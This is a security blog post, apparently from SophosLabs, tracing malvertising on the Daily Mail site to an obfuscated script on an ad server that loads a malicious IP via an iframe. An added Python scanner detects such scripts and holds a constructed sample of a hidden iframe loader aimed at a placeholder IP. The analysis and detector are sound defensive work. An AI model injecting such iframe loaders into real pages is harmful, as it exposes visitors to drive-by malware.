Last night, The Register asked us to look into a reader tip in regard to the website of the Daily Mail newspaper.

While doing an initial investigation I may not have been clear as to what was happening; this blog should clear up any misunderstanding.

Investigating the affected website initially, I could see nothing untoward. However, the site did have links to lots of other websites and it contained several advert-related links.

Investigating further on a goat machine which has an aggressively logging web proxy, I was able to see suspicious behaviour.

At the beginning, Internet Explorer loads its default homepage and then I access the affected webpage.

After half a dozen refreshes I was able to see the following. (Note that I am obscuring the malicious webpages.)

The last few IPs are known to SophosLabs as having hosted malware in the past.

So what is happening here?

The Daily Mail is loading adverts from various sites.

One of those advert sites is loading the malicious IP.

Initially, the finger of suspicion pointed at the sites preceding the bad IP. However, further investigation showed that the site anm.co.uk was hosting the malicious code alongside legitimate adverts. Going to one of the bad adverts, I saw a legitimate advert, and when I viewed the source code:

As you can see from the above image, this page references bs.serving-sys.com and has an obfuscated script on it. This script is detected by Sophos as Mal/ObfJS-BI in the WS1000. When the obfuscated script is decoded, it loads the malicious IP via an iframe.
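As an added example (not Sophos code and not from the original post), a small Python scanner that flags the two features described above in an ad page's source: an obfuscated inline script, and an iframe pointing at a bare IP address, including one that the script itself writes out. The sample page, the ads.example.net host and the 192.0.2.10 address are constructed placeholders.

```python
import re
from html.parser import HTMLParser

# Tokens that, seen together in one inline script, suggest the kind of
# obfuscated loader described above (eval/unescape chains writing markup).
OBFUSCATION_TOKENS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")
# A URL whose host is a raw IPv4 address rather than a hostname.
IPV4_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:/|\b)")

class AdPageScanner(HTMLParser):
    """Collect whole inline <script> bodies and <iframe> src values from a page."""
    def __init__(self):
        super().__init__()
        self.scripts, self.iframes, self._buf = [], [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self.iframes.append(a.get("src") or "")
        elif tag == "script" and "src" not in a:
            self._buf = []          # start buffering an inline script
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))   # script text may arrive in chunks
            self._buf = None
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

def scan_ad_page(html):
    """Return (kind, detail) findings: obfuscated scripts, iframes to raw IPs,
    and raw-IP iframes emitted from inside script text."""
    p = AdPageScanner()
    p.feed(html)
    findings = []
    for s in p.scripts:
        hits = [t for t in OBFUSCATION_TOKENS if t in s]
        if len(hits) >= 2:
            findings.append(("obfuscated_script", ",".join(hits)))
        if "iframe" in s.lower():
            for m in IPV4_URL.finditer(s):
                findings.append(("script_iframe_to_ip", m.group(0)))
    for src in p.iframes:
        if IPV4_URL.match(src):
            findings.append(("iframe_to_ip", src))
    return findings

# Constructed sample: a legitimate banner plus a decoded-style script that writes
# a 1x1 iframe to a placeholder (documentation-range) IP address.
SAMPLE = """<html><body><img src="http://ads.example.net/banner.gif">
<script>eval(unescape('%64%6f'));document.write('<iframe src="http://192.0.2.10/in.php" width=1 height=1></iframe>')</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_ad_page(SAMPLE):
        print(kind, detail)
```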